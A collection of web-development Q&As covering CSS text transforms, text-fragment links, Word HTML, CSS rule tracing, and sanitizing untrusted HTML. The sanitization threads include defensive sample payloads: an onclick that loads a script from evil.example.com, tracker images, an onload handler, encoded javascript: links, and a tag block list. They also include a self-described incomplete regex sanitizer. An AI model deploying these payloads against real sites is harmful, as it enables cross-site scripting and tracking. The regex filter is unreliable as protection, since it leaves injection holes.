Display one letter as another in a page while copying untransformed text - html

In CSS, .someclass { text-transform: uppercase } displays all text with class someclass in uppercase, but when I select the text, copy it, and paste it into a text editor or e-mail, the letters retain their original case. Does some client-side web styling technology other than CSS let a document define a custom text transformation that changes things other than case, such as r to w or f to ꝼ, without the transformation being applied when the user copies the text?
Answers to Replace a particular character using css recommended JavaScript. I'd prefer to use some (non-CSS) declarative styling technology instead of script for a few reasons:
I want copy-and-paste to return the original text, not the transformed text, in the same way as the text-transform property.
I want "Find within page" (Ctrl+F) to work if the user types the untransformed letter.
I lack statistics on how many viewers of my site use NoScript or some other script-whitelisting plug-in, but my intuition is skewed by the fact that I regularly visit an online forum whose users often brag about not being affected by a particular exploit because they don't run JavaScript.
A script that runs onload will cause a noticeable flash of unstyled content as the lines are rewrapped.
Recently I was able to write an XSLT stylesheet that alters text nodes within the <body>, based on an answer to a question about whitelisting characters.
(Hint: match="html:body//text()" and translate().)
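Roughly, the approach looks like this sketch: an identity transform plus one template for body text nodes (the namespace prefix and the r-to-w, f-to-ꝼ mapping here are illustrative):
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:html="http://www.w3.org/1999/xhtml">
  <!-- identity transform: copy everything through unchanged -->
  <xsl:template match="@*|node()">
    <xsl:copy><xsl:apply-templates select="@*|node()"/></xsl:copy>
  </xsl:template>
  <!-- rewrite only the text nodes inside the body -->
  <xsl:template match="html:body//text()">
    <xsl:value-of select="translate(., 'rf', 'wꝼ')"/>
  </xsl:template>
</xsl:stylesheet>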
It fails the copy and Ctrl+F criteria, and it reportedly fails the no-FOUC criterion in browsers that try to get too clever, but it should load in just about every major browser since IE 6 even with script turned off.
However, a year ago, Google tried to kill client-side XSLT by removing it from Blink.
If Chrome, Opera, and other Chromium-based browsers end up dropping XSLT over this, no-XSLT users will probably outnumber no-script users.
Is acquiring a libre font and modifying it to include custom forms and ligatures that @font-face, font-feature-settings, and font-variant-ligatures can trigger the only way?
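(For concreteness, the kind of CSS that would trigger such a modified font; the font name, file, and feature tag below are hypothetical:)
@font-face {
  font-family: "MyTransformFont"; /* hypothetical modified libre font */
  src: url("mytransformfont.woff") format("woff");
}
.someclass {
  font-family: "MyTransformFont";
  font-feature-settings: "ss01"; /* hypothetical stylistic set mapping r to w */
}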

CSS stands for Cascading Style Sheets: as the name implies, it is only for styling the sheets (HTML pages). The snippet .someclass { text-transform: uppercase } is just styling the characters inside the tags with class someclass. It isn't easy, and I'd even say it isn't possible, to achieve what you need using only CSS and no JavaScript.
As Zach Saucier's comment on your question says, "There is no good way to do this with CSS", and I agree with that.
With JavaScript it's absolutely possible, but your criteria rule that out.
My request to you: either try using JavaScript, or try something other than CSS.

Related

How to generate a hyperlink to specific point on page without an id/name?

Scenario/Request
I would like to send someone a link to a website that I don't control / can't change.
As the page is quite long (11 paragraphs), I would like to point users to a specific point on the page.
However, there are no id/name attributes in the page; the content is all made up of unnamed <h2> and <p> tags.
Is there any way I can generate a link to something like a relative CSS anchor (e.g. the 3rd <h2> tag on the page)?
There isn't a cross-browser way to do this yet. There have been two proposals in the last decade with unofficial and/or official implementations, of which one is in active development and may soon be available as a cross-browser standard.
The first proposal was CSS Selectors as Fragment Identifiers, which would have allowed you to use a CSS selector to link to a specific element in the page via a URL fragment:
https://example.com/index.html#css(h2:nth-of-type(3))
(This does not actually represent the 3rd h2 on the page. It is not possible to write a CSS selector for that.)
A draft was written, some discussions were had (that I was personally involved in), and some proofs-of-concept in the form of browser extensions were made, but it never took off. See also CSS selector fragment support
The second proposal, and the one currently in active development, is Text Fragments, which allows you to link to arbitrary text in a URL fragment:
https://example.com/index.html#:~:text=Example%20Heading
The first implementation was by Google themselves, in the form of an extension for Google Chrome and Microsoft Edge, but the feature has since shipped natively in a number of Chromium-based browsers (as of 2020). Try it with a phrase from your question or from my answer.
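For reference, the full text-fragment syntax also supports ranges and disambiguating context; the general pattern (bracketed parts optional) is:
#:~:text=[prefix-,]textStart[,textEnd][,-suffix]
so a range link such as https://example.com/index.html#:~:text=quite%20long,specific%20point highlights everything from the first phrase through the second.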

author html for ms word

My objective is to generate HTML markup that targets MS Word. So far I've found that if you put all the styles inline on each element, the document renders properly when opened in Word. However, that is a lengthy task.
<h1 style="font-family:Arial">Inventory</h1>
This is how I currently achieve formatting: if I want to maintain a constant font across the document, I'd have to add font-family to every element in my HTML, as I've done above.
Later, I came across a CodeProject article: http://www.codeproject.com/KB/office/Wordyna.aspx. Now I'm fairly convinced that you can declare the styles globally, but the styling language and formatting used are not plain CSS; I think they're proprietary to MS Word document formatting. I'm looking for any tutorials/articles on this styling.
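From what I can tell from Word's own "Save as Web Page" output, the global styling looks roughly like the sketch below; the Office namespaces and the mso-/Section1 conventions are my reconstruction from such output, not taken from the article:
<html xmlns:o="urn:schemas-microsoft-com:office:office"
      xmlns:w="urn:schemas-microsoft-com:office:word">
<head>
<style>
  /* Word reads this global block; mso-* properties are Word's own CSS extensions */
  body { font-family: Arial; }
  h1   { font-size: 16pt; }
  @page Section1 { size: 8.5in 11.0in; margin: 1.0in; }
  div.Section1 { page: Section1; }
</style>
</head>
<body>
  <div class="Section1">
    <h1>Inventory</h1>
    <p>Body text picks up Arial from the global rule.</p>
  </div>
</body>
</html>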
PS: I am aware of OpenXML etc.; I feel it's too complex for me to implement at this point.
Word --should-- open valid HTML (read: not Microsoft's proprietary HTML-ish mess) without fail, as it's the rendering engine Outlook uses when you open an HTML email. You could go to the effort of building the document entirely inline (read: the only best practice for Microsoft), as we do for HTML emails, but I suspect there are several ways to skin this cat.
Personally, if I were trying to get a rich-text document from HTML into Word, I'd use a tool such as PHPDocX to build a proper Word document natively; then, if I really wanted Word HTML, I could simply hit Save in Word. I've had to do similarly with Excel: it will accept CSV, but the outcome is always better with XLSX, and there's a similar library for authoring a proper XLSX document.
If that's too difficult a route (and it's not that bad, trust me), then I'd stick to formatting that follows HTML email rules. Simple guides are all over the web, such as here. And since Outlook from 2007 to the current version uses Word's HTML rendering engine, one can deduce that Word has the same limitations listed here.

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, or other security issues, and then display it safely without losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; I could then implement my own logic for walking the resulting DOM and filtering out anything I didn't whitelist (a sketch of that walk follows this list). The Agility Pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
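To make the Agility Pack option concrete, the walk I'd have to write would look something like this sketch (the tag set and the "[image removed]" placeholder are just the examples from this question; this is untested):
using System.Collections.Generic;
using System.Linq;
using HtmlAgilityPack;

class WhitelistSanitizer
{
    static readonly HashSet<string> AllowedTags = new HashSet<string>
        { "html", "head", "title", "body", "p", "strong", "em", "br" };

    public static string Sanitize(string html)
    {
        var doc = new HtmlDocument();
        doc.LoadHtml(html);
        Walk(doc, doc.DocumentNode);
        return doc.DocumentNode.OuterHtml;
    }

    static void Walk(HtmlDocument doc, HtmlNode node)
    {
        // ToList() lets us remove children while iterating
        foreach (var child in node.ChildNodes.ToList())
        {
            if (child.NodeType == HtmlNodeType.Element)
            {
                if (child.Name == "img")
                {   // replace images with a visible placeholder
                    node.ReplaceChild(doc.CreateTextNode("[image removed]"), child);
                    continue;
                }
                if (!AllowedTags.Contains(child.Name))
                {   // drop non-whitelisted elements and everything inside them
                    node.RemoveChild(child);
                    continue;
                }
                // strip every attribute; nothing on this whitelist needs any
                child.Attributes.RemoveAll();
            }
            Walk(doc, child);
        }
    }
}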
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
href values on a elements that trigger code (even links we think are okay, we may well turn into plain text that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have problems like the Microsoft Anti-XSS library
is unit tested against the OWASP XSS Filter Evasion Cheat Sheet
is purpose-built for this task (in contrast to HTML Agility Pack, which is a parser)
is also available on NuGet
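Basic usage is essentially a one-liner (a minimal sketch; note the namespace is Ganss.XSS in older releases and Ganss.Xss in newer ones):
using Ganss.Xss; // NuGet package: HtmlSanitizer

var sanitizer = new HtmlSanitizer();  // ships with sensible whitelist defaults
sanitizer.AllowedTags.Remove("img");  // tighten the defaults further if desired
string safe = sanitizer.Sanitize("<p onclick=\"evil()\">Hi <script>x()</script></p>");
// safe is now roughly "<p>Hi </p>"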
I sense you'll definitely need a parser that can generate an XML/DOM tree, so that you can apply filters to it to produce what you are looking for.
See if the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options which you might also want to look at, specifically the transform section that allows you to skip the tags you don't require.
I would suggest another approach. If you control the method by which the HTML is viewed, I would remove all threats by using an HTML renderer that has no ECMAScript engine or any other XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so: you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine, one that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the JavaScript would then simply be ignored.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem; I spent some time on it. There are a lot of things we want to remove from user input, and even if I made a long list of things to be removed, HTML can evolve later on and my list would develop holes.
Nonetheless, I want users to input some simple things like bold, italic, and paragraphs... pretty simple.
No doubt the list of allowed things is shorter, and HTML changing later on won't make holes in my list unless HTML stops supporting these simple things.
So I started thinking the other way around: state only what you allow. With great pain, because I'm not an expert in regex (so please, regex people, correct or improve this), I coded this expression, and it was working for me even before HTML5 arrived.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags; feel free to add more.
This is a starting point, which is why the regex people should improve it to also remove the attributes, like onclick.
If I do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other attributes will be removed, but the corresponding closing tags will remain; and after all, we don't want those tags removed, we just want to remove their attributes.
Maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
Am I right? Can this be composed into a single pass?
We still have no relation between tags (opening/closing); no great deal so far.
Can the attribute removal be written to remove everything not on a whitelist? (Probably yes.)
One last problem: when removing tags like script, the content remains. That's desirable when removing font, but not script. Well, we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
which will remove certain tags and their content. But it's a blacklist, meaning you have to keep an eye on it in case HTML changes.
Note: all with the "gi" flags.
Edit:
I joined all of the above into this function:
String.prototype.sanitizeHTML = function (white, black) {
    if (!white) white = "b|i|p|br";            // allowed tags
    if (!black) black = "script|object|embed"; // tags removed together with their content
    var e = new RegExp("(<(" + black + ")[^>]*>.*</\\2>|(?!<[/]?(" + white + ")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
    return this.replace(e, "");
};
- blacklist -> the tag and its content are removed entirely
- whitelist -> the tags are retained
- other tags are removed, but their content is retained
- all attributes of the whitelisted (remaining) tags are removed
There is still room for a whitelist of attributes (not implemented above), because if I want to preserve img then src must stay... and what about tracking images?
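For example, with the defaults above (the input string is illustrative):
var input = '<p onclick="alert(1)">Hi <b>there</b> <script>evil()</script><div>text</div></p>';
input.sanitizeHTML();
// -> '<p>Hi <b>there</b> text</p>'
// the script tag goes away with its content, the div is stripped but its
// text is kept, and the onclick attribute is removed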

Any tool to show you all elements/pages in a site that are affected by a particular CSS rule?

Of course we can use tools like Firebug to highlight portions of HTML and see what CSS is being applied.
But what about the reverse? Is there some kind of tool which would allow you to highlight a particular CSS rule and show you all the pages on a site (either static HTML pages or their dynamic templates) that it applies to?
Example: I've come to work on a new site, very large, and I need to edit the CSS for a particular page; but in doing so, I have no idea how many other pages on the site might also use these class names and hence be affected. Of course I can try to search the whole site for the class name(s), but this can be time-consuming or tricky. This site has a class named "ba", for example. Guess how many irrelevant pages will turn up if I just search for "ba"? So how about including a double quote ("ba)? Well, the class could be in the middle of a few other classes (class="hz ba top"), at the end (class="hz ba"), etc. What's more, it could be dynamically plugged in via server-side code, making it even harder to find. A tool that could somehow spider your site and identify all the places your CSS change will affect would be great.
Not exactly that, but there is a Firebug plugin that does this for any loaded page:
http://robertnyman.com/firefinder/
You could use regular expressions.
For example, in Dreamweaver's search dialog box:
select 'Find in: Entire current local site'
select 'Search: Source code'
check 'Use regular expression'
in the find textarea type class\s*?=\s*?".*?content.*?" (with your class name in place of content)
click 'Find All'
The same regular expression could be used with other software that can search inside files using regular expressions,
for example: http://www.sowsoft.com/search.htm (not affiliated with them, just found it for this answer).
Keep in mind, though, that none of the suggestions here take into account the case where the class is added by script.
If you use a Mac, there's an excellent shareware app called CSSEdit, by an indie Mac shop in Belgium. A single-user license is 30 euros. I've used it for approximately three years and can recommend it highly. It's a mature, stable app (though continuously updated/improved), widely used among Mac web designers, and among those of us who are not designers but need all the help we can get, which CSSEdit certainly provides.
To show the elements on the HTML page styled by a given selector:
(i) open both the style sheet and the markup page (the markup page must have a link to the style sheet);
(ii) click the X-Ray button off (it must read 'Not Active' below the button);
(iii) in the style editor, click any selector (I click so that my cursor is at the left margin, e.g., in front of the '#', etc.);
(iv) now click 'Inspector' on the markup page (next to 'X-Ray').
Now look at your markup page: it will have a blue outline around the elements affected by the style you clicked in step (iii) above.
For this kind of thing I just use grep or, even better, ack.
If you're concerned about false positives when searching for short patterns, you can do a double filter: grep all lines containing class= and feed the output into another grep that narrows the results down to the lines containing both class= and your search pattern (which can also be specified more precisely with a regexp using word boundaries like \bba\b, to avoid matching bar or abba).
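A concrete pipeline (GNU grep syntax; ba is the class name from your example):
# every line mentioning class=, narrowed to those containing the word "ba"
grep -rn 'class=' . | grep -E '\bba\b'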
How about putting an ID on the body of each page, and using it to restrict each CSS rule to the pages explicitly named in the CSS?
Like this:
#mypage .description,
#myotherpage .description {
}
Cons:
Must put a body ID on each page / template.
Must specify each page the CSS should apply to. More CSS code to manage.
Makes the CSS less easy to scan through with your eyes (since each line starts with the page ID and not the CSS style). This is a bigger problem if some of the CSS styles are used on several pages (since the selector list for each style would be long).
Pros:
Avoids unintended CSS change propagation, i.e., changing one page accidentally affecting other, unknown pages.
See what pages a CSS change would affect, when you're editing the CSS style itself. The information is right there; no need to search/grep for it.
Forces developers to specify what pages the CSS would affect. If you'd just included this information as comments in your CSS, some person would inevitably forget to update the comment when the CSS is used on a new page.
I agree with this statement, made by a friend:
"Minimize CSS that is used in several places. It's not like programming; a little duplicate CSS is better than unmanageable CSS. (Sites like apple.com have their own stylesheet for each page, plus some global CSS.)"
- Olav Bjørkøy, original creator of the Blueprint CSS framework
I'd love your input on this, or if any of you have found a better way.

Apart from <script> tags, what should I strip to make sure user-entered HTML is safe?

I have an app that reprocesses HTML in order to do nice typography. Now, I want to put it up on the web to let users type in their text. So here's the question: I'm pretty sure that I want to remove the SCRIPT tag, plus closing tags like </form>. But what else should I remove to make it totally safe?
Oh good lord you're screwed.
Take a look at this
Basically, there are so many things you want to strip out. Plus, there's markup that's valid but could be used in malicious ways. What if the user wants to set their font size smaller on a footnote? Do you care if that gets applied to your entire page? How about setting colors? Now all the words on your page are white on a white background.
I would revisit the requirements phase.
Is a markdown-like alternative possible?
Can you restrict access to the final content, reducing risk of exposure? (meaning, can you set it up so the user only screws themselves, and can't harm other people?)
You should take the white-list rather than the black-list approach: Decide which features are desired, rather than try to block any unwanted feature.
Make a list of desired typographic features that match your application. Note that there is probably no one-size-fits-all list: It depends both on the nature of the site (programming questions? teenagers' blog?) and the nature of the text box (are you leaving a comment or writing an article?). You can take a look at some good and useful text boxes in open source CMSs.
Now you have to choose between your own markup language and HTML. I would choose a markup language. The pro is better security; the con is the inability to embed unexpected internet content, like YouTube videos. A good way to prevent users' rage is to add an "HTML to my-site" feature that translates the supported HTML tags into your markup language and deletes all other tags.
The pros of HTML are consistency with standards, extensibility to new content types, and simplicity. The big con is code-injection security issues. Should you pick HTML, try to adopt a proven system for filtering it (I think Drupal does quite a good job in this case).
Instead of blacklisting some tags, it's always safer to whitelist. See what stackoverflow does: What HTML tags are allowed on Stack Overflow?
There are just too many ways to embed scripts in the markup. javascript: URLs (encoded of course)? CSS behaviors? I don't think you want to go there.
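For instance, one classic evasion from the OWASP cheat sheet: entity-encode part of the scheme, and a naive filter that looks for the literal string javascript: never sees it:
<a href="jav&#x61;script:alert('XSS')">click me</a>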
There are plenty of ways that code could be sneaked in; especially watch for situations like <img src="http://nasty/exploit/here.php">, which can feed a <script> tag to your clients. I've seen <script> blocked on sites before while the img tag got right through, which resulted in 30-40 stolen passwords.
<iframe>
<style>
<form>
<object>
<embed>
<bgsound>
is what I can think of. But to be safe, use a whitelist instead: things like <a> and <img>† that are (mostly) harmless.
† Just make sure that any javascript:... / on*=... are filtered out too... as you can see, it can get quite complicated.
I disagree with person-b. You're forgetting about javascript attributes, like this:
<img src="xyz.jpg" onload="javascript:alert('evil');"/>
Attackers will always be more creative than you when it comes to this. Definitely go with the whitelist approach.
MediaWiki is more permissive than this site: it accepts setting colors (even white on white), margins, indents, and absolute positioning (including positions that put the text completely off screen), clipping and "display:none", font sizes (even ridiculously small or excessively large ones), and font names (even a legacy non-Unicode Symbol font name that will not render text successfully), as opposed to this site, which strips out almost everything.
But MediaWiki successfully strips the dangerous active scripting out of CSS (i.e. behaviors, onEvent handlers, active filters, and javascript: link targets) without filtering out the style attribute completely, and it bans a few other active elements like object, embed, and bgsound.
Both sites ban marquees as well (not standard HTML, and needlessly distracting).
But MediaWiki sites are patrolled by lots of users, and there are policy rules for banning users who abuse things repeatedly.
It offers support for animated images, and provides support for approved active extensions, such as rendering TeX math expressions, other approved extensions (like timeline), and creating or customizing a few forms.